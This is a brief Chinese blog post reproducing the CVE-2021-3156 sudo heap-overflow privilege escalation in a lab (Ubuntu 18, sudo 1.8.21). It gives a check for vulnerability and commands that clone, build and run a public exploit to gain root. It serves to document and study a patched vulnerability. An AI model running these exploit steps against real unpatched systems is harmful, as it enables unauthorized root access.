CVE-2021-3156 sudo提权漏洞复现

CVE-2021-3156 sudo提权漏洞复现

sudo官方在一月份的时候已经将漏洞修复,因此后面更新安装的sudo已经补上这个漏洞

复现环境

Ubuntu18 + sudo 1.8.21

image-20210411151758529

低权限用户test

image-20210411151846141

vim /etc/sudoers

test ALL=(root) NOPASSWD:/usr/sbin/useradd,/usr/sbin/usermod

漏洞复现

image-20210411152027247

报错开头以sudoedit则存在漏洞,报错以usage开头,则不受影响

下载exp并执行

git clone https://github.com/blasty/CVE-2021-3156.git
make
./sudo-hax-me-a-sandwich 0

image-20210411152155906

posted @ 2021-04-11 16:36  buchiyexiao  阅读(3134)  评论(0)    收藏  举报
Live2D